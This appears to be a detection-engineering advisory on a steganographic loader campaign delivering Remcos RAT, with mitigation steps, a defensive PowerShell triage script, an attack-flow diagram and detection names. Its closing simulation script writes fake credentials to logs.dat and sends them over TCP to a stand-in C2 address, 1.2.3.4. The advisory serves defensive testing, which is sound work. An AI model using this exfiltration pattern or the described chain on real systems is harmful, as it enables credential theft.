A Multi-Stage Steganographic Loader Campaign Deploying Diverse Payloads Worldwide
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A multi-stage malware campaign relies on steganography and in-memory execution to deliver multiple payloads, including Remcos RAT. The infection chain starts with a phishing email carrying a malicious archive that drops a .NET executable. That executable uses embedded resources and steganographic methods to load later stages directly into memory, helping the malware avoid disk-based detection.
Investigation
The investigation began after telemetry flagged a suspicious file named GST Debit Note Apr_26.com. Analysts determined that the file was a packed 32-bit .NET executable disguised as a game. Further reverse engineering revealed steganography embedded in a .NET Bitmap object, which concealed the next-stage loader, Optimax.dll, and allowed it to run fully in memory.
Mitigation
Organizations should deploy strong email filtering to block suspicious archive attachments and phishing attempts. EDR solutions should be capable of detecting in-memory execution, process hollowing, and suspicious PowerShell behavior. Teams should also monitor for unauthorized registry changes, especially in Run keys, and enforce strict application control to prevent unsigned executables from launching.
Response
Affected endpoints should be isolated immediately to limit lateral movement and data theft. Investigators should perform memory forensics to identify fileless components and confirm the presence of the Remcos_Mutex_Inj mutex. A full sweep should also check for unauthorized persistence in the AppData directory and registry Run keys, while credentials should be reset for any users whose browsers may have been accessed by the malware.
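A triage script for the response steps above, added here as an example (not from the original advisory): it tests whether the Remcos_Mutex_Inj mutex is currently held by a running process and lists Run-key entries whose command launches from AppData\Roaming. The Global\ namespace variant of the mutex name and the WOW6432Node Run key are assumptions, not values taken from the page.

```powershell
# Added triage script, not part of the original advisory. Assumes a Windows host and an
# elevated session (for HKLM Run keys). The Global\ mutex variant is an assumption; the
# advisory names only Remcos_Mutex_Inj.

function Test-RemcosMutex {
    param([string[]]$Names = @('Remcos_Mutex_Inj', 'Global\Remcos_Mutex_Inj'))
    $hits = @()
    foreach ($name in $Names) {
        $m = $null
        try {
            # TryOpenExisting succeeds only if a running process already created the named mutex.
            if ([System.Threading.Mutex]::TryOpenExisting($name, [ref]$m)) {
                $hits += $name
                $m.Dispose()
            }
        } catch [System.UnauthorizedAccessException] {
            # The mutex exists but cannot be opened with our rights: still a positive indicator.
            $hits += "$name (exists, access denied)"
        }
    }
    return $hits
}

function Get-RoamingRunEntries {
    # Run-key values whose command points into AppData\Roaming, the campaign's persistence location.
    $keys = @('HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
              'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
              'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run')
    $meta = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
    $findings = @()
    foreach ($key in $keys) {
        if (-not (Test-Path $key)) { continue }
        foreach ($prop in (Get-ItemProperty -Path $key).PSObject.Properties) {
            if ($meta -contains $prop.Name) { continue }   # skip provider metadata properties
            $cmd = [string]$prop.Value
            if ($cmd -match '(?i)\\AppData\\Roaming\\') {
                $findings += [pscustomobject]@{ Key = $key; Name = $prop.Name; Command = $cmd }
            }
        }
    }
    return $findings
}

$mutexHits = Test-RemcosMutex
$runHits   = Get-RoamingRunEntries
if ($mutexHits) { Write-Host "Remcos mutex present: $($mutexHits -join ', ')" }
if ($runHits)   { $runHits | Format-Table -AutoSize }
if (-not $mutexHits -and -not $runHits) { Write-Host 'No Remcos mutex or AppData\Roaming Run entries found.' }
```

A hit on either check is a reason to proceed to the memory forensics and credential reset steps; an empty result does not clear the host, since the mutex only exists while the RAT is running.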
Attack Flow
graph TB
%% Class Definitions Section
classDef action fill:#99ccff
classDef malware fill:#ff99cc
classDef technique fill:#c2f0c2
classDef file fill:#e1e1e1
%% Node Definitions
%% Initial Access
attack_phishing["<b>Action</b> - <b idea='T1566.001'>Phishing: Spearphishing Attachment</b><br/><b>Details</b>: Malicious archive GST Debit Note Apr_26.com sent to victims."]
class attack_phishing action
%% Evasion and Loader Stage 1
evasion_stego["<b idea='T1027.003'>Obfuscated Files or Information: Steganography</b><br/><b>Details</b>: Hiding Optimax.dll inside a serialized .NET Bitmap object<br/>within the executable resource section."]
class evasion_stego technique
exec_appdomain["<b idea='T1574.014'>Hijack Execution Flow: AppDomainManager</b><br/><b>Details</b>: Using reflection and AppDomain.Load to execute<br/>payload directly from memory without touching disk."]
class exec_appdomain technique
%% Second Stage
loader_stage2["<b idea='T1055.012'>Process Injection: Process Hollowing</b><br/><b>Details</b>: System Optimizer Ultimate.dll deploys final payload<br/>by hollowing a default browser process."]
class loader_stage2 technique
malware_remcos["<b idea='Malware'>Remcos RAT</b><br/><b>Description</b>: Remote Access Trojan deployed<br/>as the final payload."]
class malware_remcos malware
%% Persistence and Evasion
evasion_sandbox["<b idea='T1497'>Virtualization/Sandbox Evasion</b><br/><b>Details</b>: Checking for sbiedll.dll and registry keys<br/>to detect sandboxes or virtual machines."]
class evasion_sandbox technique
persistence_active["<b idea='T1547.014'>Boot or Logon Autostart Execution: Active Setup</b><br/><b>Details</b>: Copying malware to AppData\Roaming and<br/>configuring a Run registry key for persistence."]
class persistence_active technique
%% Collection and Exfiltration
collect_browser["<b idea='T1217'>Browser Information Discovery</b><br/><b>Details</b>: Collecting Chrome and Firefox credentials."]
class collect_browser technique
steal_cookies["<b idea='T1539'>Steal Web Session Cookie</b><br/><b>Details</b>: Capturing active web session cookies."]
class steal_cookies technique
exfil_c2["<b idea='T1041'>Exfiltration Over C2 Channel</b><br/><b>Details</b>: Sending captured data from logs.dat<br/>to the attacker via Command and Control."]
class exfil_c2 technique
file_logs["<b idea='File'>logs.dat</b><br/><b>Description</b>: Local file used to store<br/>stolen credentials and cookies."]
class file_logs file
%% Connections
%% Flow of attack
attack_phishing -->|leads_to| evasion_stego
evasion_stego -->|unpacks| exec_appdomain
exec_appdomain -->|loads| loader_stage2
loader_stage2 -->|deploys| malware_remcos
%% Malware actions
malware_remcos -->|performs| evasion_sandbox
malware_remcos -->|establishes| persistence_active
malware_remcos -->|performs| collect_browser
collect_browser -->|leads_to| steal_cookies
steal_cookies -->|saves_to| file_logs
file_logs -->|sent_via| exfil_c2
Detections
- Call Suspicious .NET Methods from Powershell (via powershell)
- Possible Persistence Points [ASEPs - Software/NTUSER Hive] (via registry_event)
- The Possibility of Execution Through Hidden PowerShell Command Lines (via cmdline)
- Possible Powershell Obfuscation Indicators (via powershell)
- Exfiltration of Captured Data to Command and Control [Windows Network Connection]
- Execution of Obfuscated PowerShell Script in Steganographic Loader Campaign [Windows Powershell]
- Detection of Remcos RAT Infection via Steganographic and Fileless Techniques [Windows Process Creation]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
Attack Narrative & Commands: The adversary has successfully established a foothold. To complete the objective, they collect system telemetry and stash it in a file named logs.dat to masquerade as standard system logs. The adversary then initiates a network connection to the established C2 infrastructure (using the IP 1.2.3.4 and port 37393 for this simulation) to exfiltrate the data. This mimics the behavior of a steganographic loader attempting to move data out of the network via a specific, hardcoded channel.
Regression Test Script:
# Simulation of Data Exfiltration via specific filename and C2 parameters
$C2_IP = "1.2.3.4"      # Simulated C2 IP
$C2_PORT = 37393
$FILENAME = "logs.dat"

# 1. Create the 'malicious' data file (path separator restored: $env:TEMP\$FILENAME)
Write-Output "Sensitive Data: UserCredentials_Admin_Pass123" | Out-File -FilePath "$env:TEMP\$FILENAME"

# 2. Simulate the network connection to the C2
# Using a TCP Client to force the specific port/IP telemetry
try {
    $client = New-Object System.Net.Sockets.TcpClient($C2_IP, $C2_PORT)
    $stream = $client.GetStream()
    # -Raw returns one string instead of an array of lines, which GetBytes expects
    $data = [System.Text.Encoding]::ASCII.GetBytes((Get-Content -Raw "$env:TEMP\$FILENAME"))
    $stream.Write($data, 0, $data.Length)
    $client.Close()
} catch {
    Write-Host "Connection failed (Expected if IP is non-existent), but telemetry should be captured by the firewall."
}
Cleanup Commands:
# Remove the simulated malicious file (path separator restored: $env:TEMP\logs.dat)
Remove-Item -Path "$env:TEMP\logs.dat" -ErrorAction SilentlyContinue